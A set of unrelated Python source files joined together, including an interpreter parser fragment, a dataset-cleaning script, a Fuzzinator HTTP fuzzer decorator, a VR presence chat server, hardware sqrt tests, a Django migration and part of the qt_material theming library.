global code, file, pos, line, oldLine, oldPos, oldCode, oldFile
code = oldCode
file = oldFile
pos = oldPos
line = oldLine
oldCode = ""
oldFile = ""
oldPos = 0
oldLine = 0
next_instr = ""
def next_instruction():
global code, pos, next_instr, line
if pos >= len(code)-1:
return True
char = code[pos]
if pos != 0:
# Get to next line if not at top
while char != "\n":
char = code[pos]
pos += 1
if char == "\n":
line += 1
if pos >= len(code)-1:
return True
# Get to next char
char = code[pos]
if char == "\n":
line += 1
while char == " " or char == "\t" or char == "\n":
pos += 1
if pos >= len(code)-1:
return True
char = code[pos]
if char == "\n":
line += 1
# Get to end of instruction
next_instr = ""
char = code[pos]
while char != " " and char != "\n":
next_instr += char
pos += 1
if pos >= len(code)-1:
next_instr += code[pos]
break
char = code[pos]
if char == "\n":
line += 1
return False
def get_next_param():
global code, pos, line
# Get first char of param
char = code[pos]
while char == " ":
pos += 1
char = code[pos]
# Get param
openQuote = False
running = True
param = ""
while running:
# Check if at end
if is_paramend(openQuote):
running = False
# if not at end
if running:
char = code[pos]
canAdd = True
isEscape = False
# If escape char then ignore other stuff
if char == "\\":
param += char
pos += 1
char = code[pos]
param += char
isEscape = True
if not isEscape:
# Quote Check
if char == "\"":
openQuote = not openQuote
canAdd = False
# Check if at end
if (char == " " or char == "\n") and (not openQuote):
running = False
canAdd = False
if char == "\n":
line += 1
# Add char to param
if canAdd:
param += char
pos += 1
return param
def is_paramend(openquote):
return pos >= len(code) or code[pos] == "\n" or (not openquote and code[pos] == "#")
|
"""
Tyson Reimer
University of Manitoba
October 13th, 2019
"""
import os
import numpy as np
from umbmid import get_proj_path, verify_path, get_script_logger, null_logger
from umbmid.loadsave import save_pickle, save_mat
from umbmid.build import import_fd_cal_dataset
from umbmid.sigproc import iczt
###############################################################################
__OUTPUT_DIR = os.path.join(get_proj_path(),
'datasets/')
verify_path(__OUTPUT_DIR)
###############################################################################
def make_clean_files(gen='one', cal_type='emp', sparams='s11',
logger=null_logger):
"""Makes and saves the clean .mat and .pickle files
Parameters
----------
gen : str
The generation of data to be used, must be in ['one', 'two', 'three']
cal_type : str
The type of calibration to be performed, must be in
['emp', 'adi']
sparams : str
The type of sparam to save, must be in ['s11', 's21']
logger :
A logger for logging progress
"""
assert gen in ['one', 'two', 'three'], \
"Error: gen must be in ['one', 'two', 'three']"
assert sparams in ['s11', 's21'], \
"Error: sparams must be in ['s11', 's21']"
# Load the frequency-domain dataset
logger.info('\tImporting FD data and metadata...')
fd_data, fd_md = import_fd_cal_dataset(cal_type=cal_type,
prune=True,
gen=gen,
sparams=sparams,
logger=logger)
logger.info('\tImport complete. Saving to .pickle and .mat files...')
# Define an output dir for this generation of dataset
this_output_dir = os.path.join(__OUTPUT_DIR,
'gen-%s/clean/' % gen)
verify_path(this_output_dir) # Verify that this dir exists
logger.info('Num data samples:\t\t%s' % np.size(fd_data, axis=0))
logger.info('Length of metadata:\t\t%s' % len(fd_md))
# Save the frequency-domain data and metadata
save_pickle(fd_md,
os.path.join(this_output_dir, 'md_list_%s_%s.pickle' %
(sparams, cal_type)))
save_pickle(fd_data,
os.path.join(this_output_dir, 'fd_data_%s_%s.pickle' %
(sparams, cal_type)))
save_mat(fd_data, 'fd_data_%s' % sparams,
os.path.join(this_output_dir, 'fd_data_%s_%s.mat'
% (sparams, cal_type)))
save_mat(fd_md, 'md_%s' % sparams,
os.path.join(this_output_dir, 'md_list_%s_%s.mat'
% (sparams, cal_type)))
logger.info('\tComplete saving clean data files.')
###############################################################################
if __name__ == '__main__':
our_logger = get_script_logger(__file__)
for cal_type in ['emp', 'adi']:
# for cal_type in ['adi']:
for gen in ['three']: # For each generation of dataset
if gen in ['two', 'three']: # If the second or third generation
# S11 and S21 are possible sparams
possible_sparams = ['s11', 's21']
else: # If the first generation
# S11 is the only possible sparam
possible_sparams = ['s11']
for sparams in possible_sparams: # For each possible sparam
make_clean_files(gen=gen,
sparams=sparams,
cal_type=cal_type,
logger=our_logger)
|
# Copyright (c) 2016-2021 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import asyncio
import logging
import socket
import threading
from inspect import isclass, isroutine
from tornado.ioloop import IOLoop
from tornado.web import Application, RequestHandler
logger = logging.getLogger(__name__)
class TornadoDecorator(object):
"""
Decorator for fuzzers to transport generated content through http. It is
useful for transporting fuzz tests to browser SUTs.
The decorator starts a Tornado server at the start of the fuzz job and
returns an http url as test input. If the SUT accesses the domain root
through a GET request, then the decorated fuzzer is invoked and the
response is the generated test. Accessing other paths can return static
or dynamically rendered content.
**Optional parameters of the fuzzer decorator:**
- ``template_path``: Directory containing .html template files. These are
served from the path / without the .html extension.
- ``static_path``: Directory from which static files will be served.
These are served from the path /static/.
- ``url``: Url template with {port} and {index} placeholders, that will
be filled in with appropriate values. This is the url that will be
served for the SUT as the test case.
(Default: http://localhost:{port}?index={index})
- ``refresh``: Integer number denoting the time interval (in seconds)
for the document at the root path (i.e., the test case) to refresh
itself. Setting it to 0 means no refresh. (Default: 0)
**Example configuration snippet:**
.. code-block:: ini
[sut.foo]
# assuming that foo expects a http url as input, which it tries to access
# afterwards
[fuzz.foo-with-bar-over-http]
sut=foo
#fuzzer=...
fuzzer.decorate(0)=fuzzinator.fuzzer.TornadoDecorator
batch=5
[fuzz.foo-with-bar-over-http.fuzzer.decorate(0)]
template_path=/home/lili/fuzzer/templates/
static_path=/home/lili/fuzzer/static/
# assuming that there is a main.html in the template_path directory
url=http://localhost:{port}/main?index={index}
refresh=3
"""
def __init__(self, template_path=None, static_path=None, url=None, refresh=None, **kwargs):
self.template_path = template_path
self.static_path = static_path
self.url = url or 'http://localhost:{port}?index={index}'
self.refresh = int(refresh) if refresh else 0
self.port = None
# Disable all the output of the tornado server to avoid messing up with Fuzzinator's messages.
hn = logging.NullHandler()
hn.setLevel(logging.DEBUG)
logging.getLogger('tornado.access').addHandler(hn)
logging.getLogger('tornado.access').propagate = False
def __call__(self, callable):
ancestor = object if isroutine(callable) else callable
decorator = self
class Inherited(ancestor):
def __init__(self, *args, **kwargs):
if hasattr(ancestor, '__init__'):
super().__init__(*args, **kwargs)
self.index = 0
self.test = None
self.fuzzer_kwargs = dict()
self.t = None
def __call__(self, **kwargs):
# Saving fuzzer args to make them available from the RequestHandlers
# after passing a reference of ourselves.
if kwargs['index'] != 0 and self.test is None:
return None
self.fuzzer_kwargs = kwargs
return decorator.url.format(port=decorator.port, index=self.index)
def __enter__(self, *args, **kwargs):
if hasattr(ancestor, '__enter__'):
super().__enter__(*args, **kwargs)
# Get random available port.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: # pylint: disable=no-member
s.bind(('', 0))
decorator.port = s.getsockname()[1]
handlers = [(r'/', self.MainHandler, dict(wrapper=self, fuzzer=super().__call__ if isclass(callable) else callable))]
if decorator.template_path:
handlers += [(r'/(.+)', self.TemplateHandler, {})]
app = Application(handlers,
template_path=decorator.template_path,
static_path=decorator.static_path,
debug=True)
def ioloop_thread():
asyncio.set_event_loop(asyncio.new_event_loop())
app.listen(decorator.port)
IOLoop.current().start()
logger.debug('Tornado server started.')
self.t = threading.Thread(target=ioloop_thread)
self.t.start()
return self
def __exit__(self, *exc):
suppress = False
if hasattr(ancestor, '__exit__'):
suppress = super().__exit__(*exc)
self.t._stop()
logger.debug('Shut down tornado server.')
return suppress
class MainHandler(RequestHandler):
def __init__(self, application, request, wrapper, fuzzer):
super().__init__(application, request)
self.wrapper = wrapper
self.fuzzer = fuzzer
def data_received(self, chunk):
pass
def get(self):
try:
self.wrapper.fuzzer_kwargs['index'] = self.wrapper.index
self.wrapper.test = self.fuzzer(**self.wrapper.fuzzer_kwargs)
if self.wrapper.test is not None:
self.wrapper.index += 1
if decorator.refresh > 0:
self.set_header('Refresh', '{timeout}; url={url}'
.format(timeout=decorator.refresh,
url=decorator.url.format(port=decorator.port,
index=self.wrapper.index)))
test = self.wrapper.test
if not isinstance(test, (str, bytes, dict)):
test = str(test)
self.write(test)
except Exception as e:
logger.warning('Unhandled exception in TornadoDecorator.', exc_info=e)
class TemplateHandler(RequestHandler):
def get(self, page):
try:
self.render(page + '.html')
except FileNotFoundError:
logger.debug('%s not found', page)
self.send_error(404)
return Inherited
|
#!/usr/bin/env python3
import socket, threading, json, traceback, configparser, os, ssl, time, select, asyncio, websockets, importlib
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
DOMAIN = 'localhost'
PORT = 5566
PORT_SSL = 5567
USE_SSL = False
CERT = ''
KEY = ''
ADDONS_LIST = ''
if os.path.exists('server.cfg'):
config = configparser.RawConfigParser()
config.read('server.cfg')
DOMAIN = config.get('DEFAULT','domain',fallback='localhost')
PORT = config.getint('DEFAULT','port',fallback=5566)
PORT_SSL = config.getint('DEFAULT','port_ssl',fallback=5567)
USE_SSL = config.getboolean('DEFAULT','use_ssl',fallback=False)
CERT = config.get('DEFAULT','cert',fallback='')
KEY = config.get('DEFAULT','key',fallback='')
ADDONS_LIST = config.get('DEFAULT','addons',fallback='')
addons = []
for addon_name in ADDONS_LIST.split(','):
if len(addon_name) > 0 and os.path.exists(addon_name+'.py'):
module = importlib.import_module(addon_name)
module_class = module.addon()
addons.append(module_class)
userIds = {}
queues = []
lock = threading.Lock()
client_list = []
disconnect_all = False
def log(msg, silent=False):
try:
if silent == False:
print(msg)
if isinstance(msg, (bytes, bytearray)):
msg = str(msg, 'utf-8')
with open('vrpresence.log','a') as f:
f.write(str(msg)+'\n')
except:
pass
# call function in each addon
# usage example:
# pass_to_addons('user_chat', userId='name', message='hello')
def pass_to_addons(function, **kwargs):
global addons
if function is not None and kwargs is not None:
for addon in addons:
if function in dir(addon):
func = getattr(addon, function)
func(**kwargs)
class AsyncServer(threading.Thread):
use_ws = False
userId = None
roomId = None
subscribed = []
message = b''
ws_queue = None
serv = None
running = True
def __init__(self, connectioninfo=None):
if connectioninfo:
socket, address = connectioninfo
self.socket = socket
self.address = address
self.use_ws = False
else:
self.use_ws = True
#self.ws_queue = queue.Queue()
threading.Thread.__init__(self, daemon=True)
#self.daemon = True
async def send(self, socket, msg, use_ws=None):
if not isinstance(msg, (bytes, bytearray)):
msg = json.dumps(msg,separators=(',', ':')).encode('utf-8')
if not use_ws and self.socket == socket:
use_ws = self.use_ws
if use_ws:
try:
msg = str(msg, 'utf-8')+'\r\n'
except:
msg = msg+'\r\n'
try:
await socket.send(msg)
except Exception as e:
log(e)
self.running = False
else:
try:
msg = bytes(msg,'utf-8')+b'\r\n'
except:
msg = msg+b'\r\n'
try:
socket.send(msg)
except OSError:
await self.disconnect()
async def recv(self, size=1048576):
if self.use_ws:
if self.socket:
try:
return (await self.socket.recv()).encode('utf-8')
except websockets.exceptions.ConnectionClosed as e:
log(e)
await self.disconnect()
else:
if self.socket:
try:
ready = select.select([self.socket], [], [], 0)[0]
except OSError as e:
return None
if len(ready) > 0:
try:
data = self.socket.recv(size)
if not data:
return None
return data
except Exception as e:
return None
else:
return b''
return None
async def setup(self, future=None, socket=None, address=None, serv=None):
self.serv = serv
if socket:
self.socket = socket
if address:
self.address = address
self.message = b''
self.running = True
lock.acquire()
if self.ws_queue:
queues.append({'socket':self.socket,'queue':self.ws_queue})
client_list.append(self)
lock.release()
log('%s:%s connected.' % self.address)
pass_to_addons('connect', thread=self)
if future:
future.set_result(True)
if not serv:
while self.running:
await self.run()
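# Wire protocol handled by process() below (summary derived from the code): each newline-terminated
# message is a JSON object such as {"method": "logon", "data": {"userId": "...", "roomId": "..."}}.
# Until a successful "logon", every other method is rejected; afterwards "move", "enter_room",
# "subscribe", "unsubscribe", "chat" and "portal" are accepted and relayed to users in the same
# or subscribed rooms.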
async def process(self, msg):
error = None
okay = False
user_methods = {
'move': 'user_moved',
'chat': 'user_chat',
'portal': 'user_portal',
}
method = msg.get('method',None)
data = msg.get('data',None)
if method and self.userId is None:
if method == 'logon':
userId = data.get('userId',None)
roomId = data.get('roomId',None)
if roomId is None:
error = 'Missing roomId in data packet'
if userId and userId not in userIds and len(userId) > 0:
self.userId = userId
lock.acquire()
userIds[userId] = {'socket':self, 'websocket':self.use_ws, 'queue':self.ws_queue, 'roomId':roomId, 'subscribed':[roomId,]}
lock.release()
okay = True
log(self.userId+' logged in. (%s:%s)' % self.address)
pass_to_addons('logon', userId=self.userId, thread=self)
else:
error = 'User name is already in use'
else:
error = 'You must call "logon" before sending any other commands.'
elif method and self.userId:
if method == 'move':
if data:
new_method = user_methods[method]
new_data = data.copy()
new_data['_userId'] = self.userId
pass_to_addons('user_move', data=new_data, thread=self)
await self.relay({'method':new_method, 'data':{'userId':self.userId, 'roomId':self.roomId, 'position':new_data}}, self.roomId)
else:
return False
elif method == 'enter_room':
roomId = data.get('roomId',None)
if roomId:
okay = True
pass_to_addons('user_leave', userId=self.userId, roomId=self.roomId, thread=self)
pass_to_addons('user_enter', userId=self.userId, roomId=roomId, thread=self)
await self.relay({'method':'user_leave', 'data':{'userId':self.userId,'roomId':roomId}}, self.roomId)
await self.relay({'method':'user_enter', 'data':{'userId':self.userId,'roomId':roomId}}, roomId)
self.roomId = roomId
else:
return False
elif method == 'subscribe':
roomId = data.get('roomId',None)
if roomId not in self.subscribed:
self.subscribed.append(roomId)
lock.acquire()
userIds[self.userId]['subscribed'] = self.subscribed
lock.release()
okay = True
elif method == 'unsubscribe':
roomId = data.get('roomId',None)
if roomId in self.subscribed:
self.subscribed.remove(roomId)
lock.acquire()
userIds[self.userId]['subscribed'] = self.subscribed
lock.release()
okay = True
elif method == 'chat':
if data:
pass_to_addons('user_chat', userId=self.userId, message=data, thread=self)
await self.relay({'method':'user_chat','data':{'userId':self.userId, 'message':data}},self.roomId)
else:
return False
elif method == 'portal':
url = data.get('url',None)
pos = data.get('pos',None)
fwd = data.get('fwd',None)
if url and pos and fwd:
await self.relay( {'method':'user_portal', 'data':{'roomId':self.roomId, 'userId':self.userId, 'url':url, 'pos':pos, 'fwd':fwd}}, self.roomId)
else:
return False
else:
return False
if error:
await self.send(self.socket, {'method':'error', 'data':{'message':error}})
elif okay:
await self.send(self.socket, {'method':'okay'})
return True
async def relay(self, msg, roomId=None):
if isinstance(msg, dict):
msg = json.dumps(msg,separators=(',', ':')).encode('utf-8')
if roomId is None:
lock.acquire()
ids = userIds.copy()
lock.release()
for uid in ids:
if uid != self.userId:
try:
await self.send(userIds[uid]['socket'].socket, msg, userIds[uid]['socket'].use_ws)
except Exception as e:
log(e)
else:
for uid in userIds.copy():
if uid != self.userId:
if userIds[uid].get('roomId',None) == roomId or roomId in userIds[uid].get('subscribed',[]):
try:
await self.send(userIds[uid]['socket'].socket, msg, userIds[uid]['socket'].use_ws)
except Exception as e:
log(e)
async def run(self):
global disconnect_all
if self.running:
await asyncio.sleep(0)
try:
if disconnect_all:
await self.disconnect()
data = await self.recv()
if data is not None and len(data) > 0:
self.message += data
if b'\n' not in data:
return
elif data is not None and len(data) == 0:
return
elif data is None:
await self.disconnect()
return
if not data:
await asyncio.sleep(0)
return
data = data.splitlines(keepends=True)
try:
json.loads(data[0].decode('utf-8',errors='replace'))
loaded = True
except:
loaded = False
if not loaded:
return
for line in data:
if line[-1:] != b'\n':
self.message += line
else:
self.message = b''
try:
packet = json.loads(line.decode('utf-8',errors='replace'))
except:
log(traceback.format_exc())
await self.send(self.socket, {'method':'error','data':{'message':'Unable to parse last message'}})
continue
try:
if not await self.process(packet):
await self.send(self.socket, {'method':'error','data':{'message':'Unable to parse last message'}})
except Exception:
log(line)
log(traceback.format_exc())
except KeyboardInterrupt:
disconnect_all = True
await asyncio.sleep(0)
else:
await self.disconnect()
async def disconnect(self):
global disconnect_all
global client_list
global userIds
global threads
if not self.socket:
return
if self.userId:
log(self.userId+' logged out. (%s:%s)' % self.address)
try:
pass
# disabled for now: notify the room that the user disconnected
#await self.relay({'method':'user_disconnected', 'data':{'userId':self.userId}}, self.roomId)
except Exception as e:
pass
else:
log('%s:%s disconnected.' % self.address)
lock.acquire(timeout=2)
self.running = False
try:
if self.use_ws:
await self.socket.close()
else:
#self.socket.shutdown(socket.SHUT_RD)
self.socket.close()
except Exception as e:
print(e)
if self.serv and self.serv in threads:
threads.remove(self.serv)
if self.userId and self.userId in userIds:
del userIds[self.userId]
if self in client_list:
client_list.remove(self)
self.socket = None
lock.release()
print(len(threads))
if USE_SSL:
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(certfile=CERT, keyfile=KEY)
async def ssl_connection(websocket, path):
await AsyncServer().setup(socket=websocket, address=websocket.remote_address)
async def accept_connection_coro(future, loop):
global disconnect_all
global threads
asyncio.set_event_loop(loop)
if not disconnect_all:
sock = None
ready = select.select([s], [], [], 0)[0]
if len(ready) > 0:
try:
sock = s.accept()
except socket.timeout:
future.set_result(True)
return
if sock:
serv = AsyncServer(sock)
lock.acquire()
threads.append(serv)
lock.release()
await serv.setup(serv=serv)
future.set_result(True)
async def loop_connections(loop):
global disconnect_all
global threads
asyncio.set_event_loop(loop)
i = 0
for this_thread in threads:
await this_thread.run()
await asyncio.sleep(0)
i += 1
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
bound = False
while bound == False:
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((DOMAIN, PORT))
bound = True
except OSError as e:
time.sleep(5)
log(e)
except KeyboardInterrupt:
disconnect_all = True
s.listen()
threads = []
if USE_SSL:
log('Presence server running on ports '+str(PORT)+' and '+str(PORT_SSL))
else:
log('Presence server running on port '+str(PORT))
loop = asyncio.new_event_loop()
if USE_SSL:
start_server = websockets.serve(ssl_connection, DOMAIN, PORT_SSL, ssl=context, subprotocols=['binary'])
loop = asyncio.get_event_loop()
try:
while not disconnect_all:
future = asyncio.Future()
asyncio.ensure_future(accept_connection_coro(future,loop))
loop.run_until_complete(future)
if USE_SSL:
loop.run_until_complete(start_server)
loop.run_until_complete(loop_connections(loop))
time.sleep(0)
except KeyboardInterrupt:
disconnect_all = True
finally:
loop.close()
s.shutdown(socket.SHUT_RDWR)
s.close()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for sqrt module"""
import pytest
from sim import Simulator, CliArgs, path_join, write_memfile
import random
import sys
sys.path.append('../src/beh')
from sqrt import nrsqrt
def create_sim(cwd, simtool, gui, defines):
sim = Simulator(name=simtool, gui=gui, cwd=cwd)
sim.incdirs += ["../src/tb", "../src/rtl", cwd]
sim.sources += ["../src/rtl/sqrt.v", "../src/tb/tb_sqrt.sv"]
sim.defines += defines
sim.top = "tb_sqrt"
return sim
@pytest.fixture(params=[[], ['DIN_W=16'], ['DIN_W=18'], ['DIN_W=25'], ['DIN_W=32']])
def defines(request):
return request.param
@pytest.fixture
def simtool(pytestconfig):
return pytestconfig.getoption("sim")
def test_sv(tmpdir, defines, simtool, gui=False, pytest_run=True):
sim = create_sim(tmpdir, simtool, gui, defines)
sim.setup()
sim.run()
if pytest_run:
assert sim.is_passed
def test_py(tmpdir, defines, simtool, gui=False, pytest_run=True):
# prepare simulator
sim = create_sim(tmpdir, simtool, gui, defines)
sim.setup()
# prepare model data
try:
din_width = int(sim.get_define('DIN_W'))
except TypeError:
din_width = 32
iterations = 100
stimuli = [random.randrange(2 ** din_width) for _ in range(iterations)]
golden = [nrsqrt(d, din_width) for d in stimuli]
write_memfile(path_join(tmpdir, 'stimuli.mem'), stimuli)
write_memfile(path_join(tmpdir, 'golden.mem'), golden)
sim.defines += ['ITER_N=%d' % iterations]
sim.defines += ['PYMODEL', 'PYMODEL_STIMULI="stimuli.mem"', 'PYMODEL_GOLDEN="golden.mem"']
# run simulation
sim.run()
if pytest_run:
assert sim.is_passed
#@pytest.mark.skip(reason="Test is too slow")
def test_slow(tmpdir, defines, simtool, gui=False, pytest_run=True):
sim = create_sim(tmpdir, simtool, gui, defines)
sim.defines += ['ITER_N=500000']
sim.setup()
sim.run()
if pytest_run:
assert sim.is_passed
if __name__ == '__main__':
# run script with key -h to see help
args = CliArgs().parse()
try:
globals()[args.test](tmpdir='work',
simtool=args.simtool,
gui=args.gui,
defines=args.defines,
pytest_run=False)
except KeyError:
print("There is no test with name '%s'!" % args.test)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/12/12 3:58 PM
# @Author : zhangzhen12
# @Site :
# @File : run_rough.py
# @Software: PyCharm
import getopt
import sys
from stock_analytic_modules.rough.inc import update_records, period_records
def main(argv):
mode = None
try:
opts, args = getopt.getopt(argv, "hm:", ["mode="])
except getopt.GetoptError:
print('run_rough.py -m <mode:report/persist>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('run_rough.py -m <mode>')
sys.exit()
elif opt in ("-m", "--model"):
mode = arg
# Scheduled persistence of records
if mode == 'persist':
update_records()
# Scheduled email report
if mode == 'report':
period_records()
if __name__ == '__main__':
main(sys.argv[1:])
|
#!/usr/bin/python2.7
import os
from PIL import Image
DATEI_WEB_GROSSE = 700
def isimg(isitimg):
ext = os.path.splitext(isitimg)[1].lower()
if ext == ".jpg" or ext == ".png" or ext == ".gif":
return True
return False
def bearbeiten(datei):
img = Image.open(datei)
wrel = DATEI_WEB_GROSSE / float(img.size[0])
habs = int( float(img.size[1]) * float(wrel) )
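# e.g. a 1400x900 image: wrel = 700/1400 = 0.5, so the new size becomes 700x450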
splt = os.path.splitext(datei)
newfilename = splt[0] + splt[1].lower()
img = img.resize((DATEI_WEB_GROSSE, habs), Image.ANTIALIAS)
img.save(newfilename, quality=100, optimize=True, progressive=True)
if newfilename != datei:
os.rename(newfilename, datei)
def main():
files = os.listdir('.')
files = filter(isimg, files)
for f in files:
print f
bearbeiten(f)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('feedbacks', '0002_auto_20141105_1106'),
]
operations = [
migrations.AlterModelOptions(
name='attachment',
options={'verbose_name': 'attachment', 'verbose_name_plural': 'attachments'},
),
migrations.AlterModelOptions(
name='feedback',
options={'verbose_name': 'feedback', 'verbose_name_plural': 'feedbacks'},
),
migrations.AlterModelOptions(
name='feedbacktype',
options={'verbose_name': 'feedback type', 'verbose_name_plural': 'feedback type'},
),
migrations.AddField(
model_name='feedbacktype',
name='ftype',
field=models.CharField(default='bug', max_length=10),
preserve_default=False,
),
migrations.AlterField(
model_name='attachment',
name='attachment',
field=models.FileField(upload_to=b'', verbose_name='file'),
preserve_default=True,
),
migrations.AlterField(
model_name='attachment',
name='name',
field=models.CharField(max_length=254, verbose_name='name'),
preserve_default=True,
),
migrations.AlterField(
model_name='feedback',
name='date',
field=models.DateTimeField(auto_now_add=True, verbose_name='date'),
preserve_default=True,
),
migrations.AlterField(
model_name='feedback',
name='email',
field=models.EmailField(max_length=254, verbose_name='email'),
preserve_default=True,
),
migrations.AlterField(
model_name='feedback',
name='name',
field=models.CharField(max_length=254, null=True, verbose_name='name', blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='feedback',
name='subj',
field=models.CharField(max_length=254, verbose_name='subject'),
preserve_default=True,
),
migrations.AlterField(
model_name='feedback',
name='text',
field=models.TextField(verbose_name='text'),
preserve_default=True,
),
migrations.AlterField(
model_name='feedbacktype',
name='name',
field=models.CharField(max_length=80, verbose_name='name'),
preserve_default=True,
),
]
|
import os
import sys
import logging
import base64
from pathlib import Path
import platform
from xml.dom.minidom import parse
from qt_material.resources import ResourseGenerator, RESOURCES_PATH
GUI = True
if 'PySide2' in sys.modules:
from PySide2.QtGui import QFontDatabase, QColor, QGuiApplication, QPalette
from PySide2.QtWidgets import QAction, QColorDialog
from PySide2.QtUiTools import QUiLoader
from PySide2.QtCore import Qt, QDir
elif 'PySide6' in sys.modules:
from PySide6.QtGui import QFontDatabase, QAction, QColor, QGuiApplication, QPalette
from PySide6.QtWidgets import QColorDialog
from PySide6.QtUiTools import QUiLoader
from PySide6.QtCore import Qt, QDir
elif 'PyQt5' in sys.modules:
from PyQt5.QtGui import QFontDatabase, QColor, QGuiApplication, QPalette
from PyQt5.QtWidgets import QAction, QColorDialog
from PyQt5.QtCore import Qt, QDir
from PyQt5 import uic
elif 'PyQt6' in sys.modules:
from PyQt6.QtGui import QFontDatabase, QColor, QGuiApplication, QPalette, QAction
from PyQt6.QtWidgets import QColorDialog
from PyQt6.QtCore import Qt, QDir
from PyQt6 import uic
else:
GUI = False
logging.warning("qt_material must be imported after PySide or PyQt!")
import jinja2
template = 'material.css.template'
# ----------------------------------------------------------------------
def export_theme(theme='', qss=None, rcc=None, invert_secondary=False, extra={}, output='theme', prefix='icon:/'):
""""""
if not os.path.isabs(output) and not output.startswith('.'):
output = f'.{output}'
stylesheet = build_stylesheet(
theme, invert_secondary, extra, output)
with open(qss, 'w') as file:
file.writelines(stylesheet.replace('icon:/', prefix))
if rcc:
with open(rcc, 'w') as file:
file.write('<RCC>\n')
file.write(f' <qresource prefix="{prefix[:-2]}">\n')
if output.startswith('.'):
output = output[1:]
for subfolder in ['disabled', 'primary']:
files = os.listdir(os.path.join(
os.path.abspath(output), subfolder))
files = filter(lambda s: s.endswith('svg'), files)
for filename in files:
file.write(
f' <file>{output}/{subfolder}/{filename}</file>\n')
file.write(' </qresource>\n')
file.write(f' <qresource prefix="file">\n')
if qss:
file.write(f' <file>{qss}</file>\n')
file.write(' </qresource>\n')
file.write('</RCC>\n')
# ----------------------------------------------------------------------
def build_stylesheet(theme='', invert_secondary=False, extra={}, parent='theme'):
""""""
try:
add_fonts()
except Exception as e:
logging.warning(e)
theme = get_theme(theme, invert_secondary)
if theme is None:
return None
set_icons_theme(theme, parent=parent)
loader = jinja2.FileSystemLoader(os.path.join(
os.path.dirname(os.path.abspath(__file__))))
env = jinja2.Environment(autoescape=False, loader=loader)
theme['icon'] = None
env.filters['opacity'] = opacity
env.filters['density'] = density
# env.filters['as_base64'] = as_base64
# env.filters['load'] = load
stylesheet = env.get_template(template)
theme.setdefault('font_family', 'Roboto')
theme.setdefault('danger', '#dc3545')
theme.setdefault('warning', '#ffc107')
theme.setdefault('success', '#17a2b8')
theme.setdefault('density_scale', '0')
theme.setdefault('button_shape', 'default')
theme.setdefault('font_size', '13px')
theme.update(extra)
if GUI:
default_palette = QGuiApplication.palette()
if hasattr(QPalette, 'PlaceholderText'):
default_palette.setColor(QPalette.PlaceholderText, QColor(
*[int(theme['primaryColor'][i:i + 2], 16) for i in range(1, 6, 2)] + [92]))
else:
default_palette.setColor(QPalette.ColorRole.Text, QColor(
*[int(theme['primaryColor'][i:i + 2], 16) for i in range(1, 6, 2)] + [92]))
QGuiApplication.setPalette(default_palette)
environ = {
'linux': platform.system() == 'Linux',
'windows': platform.system() == 'Windows',
'darwin': platform.system() == 'Darwin',
'pyqt5': 'PyQt5' in sys.modules,
'pyqt6': 'PyQt6' in sys.modules,
'pyside2': 'PySide2' in sys.modules,
'pyside6': 'PySide6' in sys.modules,
}
return stylesheet.render(**{**theme, **environ})
# ----------------------------------------------------------------------
def get_theme(theme_name, invert_secondary=False):
if theme_name in ['default.xml', 'default_dark.xml', 'default', 'default_dark']:
theme = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'themes', 'dark_teal.xml')
elif theme_name in ['default_light.xml', 'default_light']:
invert_secondary = True
theme = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'themes', 'light_blue.xml')
elif not os.path.exists(theme_name):
theme = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'themes', theme_name)
else:
theme = theme_name
if not os.path.exists(theme):
logging.warning(f"{theme} not exist!")
return None
document = parse(theme)
theme = {child.getAttribute(
'name'): child.firstChild.nodeValue for child in document.getElementsByTagName('color')}
for k in theme:
os.environ[str(k)] = theme[k]
if invert_secondary:
theme['secondaryColor'], theme['secondaryLightColor'], theme['secondaryDarkColor'] = theme[
'secondaryColor'], theme['secondaryDarkColor'], theme['secondaryLightColor']
for color in ['primaryColor',
'primaryLightColor',
'secondaryColor',
'secondaryLightColor',
'secondaryDarkColor',
'primaryTextColor',
'secondaryTextColor']:
os.environ[f'QTMATERIAL_{color.upper()}'] = theme[color]
os.environ['QTMATERIAL_THEME'] = theme_name
return theme
# ----------------------------------------------------------------------
def add_fonts():
""""""
fonts_path = os.path.join(os.path.dirname(__file__), 'fonts')
for font_dir in ['roboto']:
for font in filter(lambda s: s.endswith('.ttf'), os.listdir(os.path.join(fonts_path, font_dir))):
QFontDatabase.addApplicationFont(
os.path.join(fonts_path, font_dir, font))
# ----------------------------------------------------------------------
def apply_stylesheet(app, theme='', style=None, save_as=None, invert_secondary=False, extra={}, parent='theme'):
""""""
if style:
try:
app.setStyle(style)
except:
logging.error(f"The style '{style}' does not exist.")
pass
stylesheet = build_stylesheet(
theme, invert_secondary, extra, parent)
if stylesheet is None:
return
if save_as:
with open(save_as, 'w') as file:
file.writelines(stylesheet)
return app.setStyleSheet(stylesheet)
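# Typical usage (illustrative sketch, not part of the original file):
#     app = QApplication(sys.argv)
#     apply_stylesheet(app, theme='dark_teal.xml')
# 'dark_teal.xml' is one of the bundled theme files returned by list_themes().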
# ----------------------------------------------------------------------
def opacity(theme, value=0.5):
""""""
r, g, b = theme[1:][0:2], theme[1:][2:4], theme[1:][4:]
r, g, b = int(r, 16), int(g, 16), int(b, 16)
return f'rgba({r}, {g}, {b}, {value})'
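# Worked example (derived from the code above): opacity('#2196f3', 0.5) -> 'rgba(33, 150, 243, 0.5)'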
# ----------------------------------------------------------------------
def density(value, density_scale, border=0, scale=1):
""""""
# https://material.io/develop/web/supporting/density
if isinstance(value, str) and value.startswith('@'):
return value[1:] * scale
density_interval = 4
